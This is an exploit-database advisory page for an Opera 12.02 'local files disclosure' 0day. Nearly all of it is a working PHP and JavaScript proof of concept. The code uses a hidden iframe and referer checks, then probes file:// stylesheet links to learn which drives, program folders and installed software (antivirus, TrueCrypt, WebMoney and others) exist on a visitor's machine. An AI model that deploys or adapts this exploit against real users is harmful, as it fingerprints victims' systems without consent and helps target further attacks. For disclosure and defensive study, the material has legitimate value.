Opera 12.02 Local files disclosure (0day)

2012-10-29 / 2012-11-01
Credit: M_script
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php if(isset($_GET['p']) && empty($_SERVER['HTTP_REFERER'])) { header('Location: ?'); die(); } if(isset($_GET['r'])) { echo '<html> <header><meta http-equiv=\'Refresh\' content=\'0; url=?p=' . (int)$_GET['r'] . '\'/></header> <body onload="location.replace(\'?p=' . (int)$_GET['r'] . '\')"></body> </html>'; die(); } if(stripos($_SERVER['HTTP_REFERER'], '?r=') !== false) { print_page(); } else if(isset($_GET['p'])) { header('HTTP/1.0 404 Not Found'); } else { $rnd = rand(1, 9999); echo '<html> <header><script>function a(){ location.replace(\'?r=' . $rnd . '\');}</script></header> <body><iframe onload="setTimeout(\'a();\', 300)" src="?p=' . $rnd . '" style="width:0px;height:0px;visibility:hidden"></iframe></body> </html>'; } function print_page() { echo <<<QWERTY <html> <body> <script> var diskStr = 'CDEFGHIJKLMNOPQRSTUVWXYZ'; var goodDiskStr = ''; var diskDiv = document.createElement('div'); diskDiv.innerHTML = '<b>disks:</b><br>'; document.body.appendChild(diskDiv); var dirArr = new Array( 'program files', 'program files (x86)' ); var goodDirArr = new Array(); var dirDiv = document.createElement('div'); dirDiv.innerHTML = '<br><b>program folders:</b><br>'; document.body.appendChild(dirDiv); var progArr = new Array( 'adobe', 'akelpad', 'alcohol soft', 'avira', 'charles', 'daemon tools lite', 'drweb', 'eset', 'filezilla ftp client', 'filezilla ftp server', 'icq7.1', 'icq7.2', 'icq7.3', 'icq7.4', 'icq7.5', 'icq7.6', 'icq7.7', 'kaspersky lab', 'mcafee', 'microsoft office', 'microsoft visual studio', 'microsoft.net', 'mozilla firefox', 'nmap', 'nvidia corporation', 'notepad++', 'psi+', 'paragon software', 'qip', 'qip2010', 'qip2011', 'skype', 'teamviewer', 'total commander', 'truecrypt', 'utorrent', 'webmoney', 'winpcap', 'winrar', 'wireshark' ); var progDiv = document.createElement('div'); progDiv.innerHTML = '<br><b>programs:</b><br>'; document.body.appendChild(progDiv); function goodDisk(diskLetter) { goodDiskStr += diskLetter; diskDiv.innerHTML += diskLetter + ':<br>'; } function goodDir(dirName) { goodDirArr.push(dirName); dirDiv.innerHTML += dirName + '<br>'; } function goodProg(progName) { progDiv.innerHTML += progName + '<br>'; } onload = function checkDisk() { for(var i in diskStr) { var newLink = document.createElement('link'); newLink.id = Math.random(); newLink.rel = 'stylesheet'; newLink.href = 'file://' + diskStr[i] + ':/*'; newLink.onload = 'goodDisk(\'' + diskStr[i] + '\')'; diskDiv.appendChild(newLink); setTimeout('diskDiv.removeChild(document.getElemen tById(\'' + newLink.id + '\'))', 2000); } setTimeout('checkDir()', 500); } function checkDir() { for(var i in goodDiskStr) { for(var j in dirArr) { var newLink = document.createElement('link'); newLink.id = Math.random(); newLink.rel = 'stylesheet'; newLink.href = 'file://' + goodDiskStr[i] + ':/' + dirArr[j]; newLink.onload = 'goodDir(\'' + goodDiskStr[i] + ':/' + dirArr[j] + '\')'; dirDiv.appendChild(newLink); setTimeout('dirDiv.removeChild(document.getElement ById(\'' + newLink.id + '\'))', 2000); } } setTimeout('checkProg()', 500); } function checkProg() { for(var i in goodDirArr) { for(var j in progArr) { var newLink = document.createElement('link'); newLink.id = Math.random(); newLink.rel = 'stylesheet'; newLink.href = 'file://' + goodDirArr[i] + '/' + progArr[j]; newLink.onload = 'goodProg(\'' + goodDirArr[i] + '/' + progArr[j] + '/\')'; dirDiv.appendChild(newLink); setTimeout('dirDiv.removeChild(document.getElement ById(\'' + newLink.id + '\'))', 2000); } } } </script> </body> </html> QWERTY; } ?>

References:

http://www.opera.com/support/kb/view/1008/
http://mscript.biz/opera_localfiles.html
http://cxsecurity.com/issue/WLB-2012100119
http://cxsecurity.com/issue/WLB-2012100086


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top